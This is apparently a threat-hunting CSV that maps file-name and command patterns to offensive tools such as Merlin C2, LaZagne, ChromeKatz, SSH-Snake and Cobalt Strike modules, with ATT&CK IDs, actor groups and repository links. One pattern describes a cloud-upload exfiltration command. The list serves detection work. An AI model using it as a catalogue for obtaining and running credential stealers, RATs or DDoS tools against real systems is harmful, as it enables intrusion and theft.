"*mdsecactivebreach/Farmer*",".{0,1000}mdsecactivebreach\/Farmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*mdsecactivebreach/WMIPersistence*",".{0,1000}mdsecactivebreach\/WMIPersistence.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*Meckazin/ChromeKatz*",".{0,1000}Meckazin\/ChromeKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*med0x2e/GadgetToJScript*",".{0,1000}med0x2e\/GadgetToJScript.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*media_variable_file_cryptography.py*",".{0,1000}media_variable_file_cryptography\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*megacmd -conf * put *mega:*",".{0,1000}megacmd\s\-conf\s.{0,1000}\sput\s.{0,1000}mega\:.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*megadose/holehe*",".{0,1000}megadose\/holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*megadose@protonmail.com*",".{0,1000}megadose\@protonmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*MegaManSec/SSH-Snake*",".{0,1000}MegaManSec\/SSH\-Snake.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*meliht/Mr.SIP*",".{0,1000}meliht\/Mr\.SIP.{0,1000}","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","383","94","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" "*melted@xmpp.jp*",".{0,1000}melted\@xmpp\.jp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Meltedd/HVNC*",".{0,1000}Meltedd\/HVNC.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Memcrashed-DDoS-Exploit*",".{0,1000}Memcrashed\-DDoS\-Exploit.{0,1000}","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1306","468","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" "*memfd implant *.elf*",".{0,1000}memfd\simplant\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*memfd task *.elf*",".{0,1000}memfd\stask\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*memory*mimipy.py*",".{0,1000}memory.{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memory/onepassword.py*",".{0,1000}memory\/onepassword\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*memreader *access_token*",".{0,1000}memreader\s.{0,1000}access_token.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*MemReader_BoF.*",".{0,1000}MemReader_BoF\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*Meowmycks/etwunhook*",".{0,1000}Meowmycks\/etwunhook.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*Meowmycks/LetMeowIn*",".{0,1000}Meowmycks\/LetMeowIn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*merlin-*.zip*",".{0,1000}merlin\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*Merlin_ServiceDesc is the grpc.ServiceDesc for Merlin service*",".{0,1000}Merlin_ServiceDesc\sis\sthe\sgrpc\.ServiceDesc\sfor\sMerlin\sservice.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-*.7z*",".{0,1000}merlinAgent\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-*.exe*",".{0,1000}merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent.exe*",".{0,1000}merlinAgent\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinAgent-Darwin-*",".{0,1000}merlinAgent\-Darwin\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-Darwin-x64-*",".{0,1000}merlinAgent\-Darwin\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Darwin-x64.*",".{0,1000}merlinAgent\-Darwin\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-agent-dll.7z*",".{0,1000}merlin\-agent\-dll\.7z.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll/tarball/v*",".{0,1000}merlin\-agent\-dll\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll/zipball/v*",".{0,1000}merlin\-agent\-dll\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlin-agent-dll\merlin.*",".{0,1000}merlin\-agent\-dll\\merlin\..{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*merlinAgent-Linux-*",".{0,1000}merlinAgent\-Linux\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*merlinAgent-Linux-x64-*",".{0,1000}merlinAgent\-Linux\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Linux-x64.*",".{0,1000}merlinAgent\-Linux\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64-*",".{0,1000}merlinAgent\-Windows\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.*",".{0,1000}merlinAgent\-Windows\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.exe *",".{0,1000}merlinAgent\-Windows\-x64\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinAgent-Windows-x86.exe *",".{0,1000}merlinAgent\-Windows\-x86\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*MerlinCheatSheet.pdf*",".{0,1000}MerlinCheatSheet\.pdf.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*merlinHTTP.HTTP*",".{0,1000}merlinHTTP\.HTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.JA3*",".{0,1000}merlinHTTP\.JA3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*merlinHTTP.PARROT*",".{0,1000}merlinHTTP\.PARROT.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 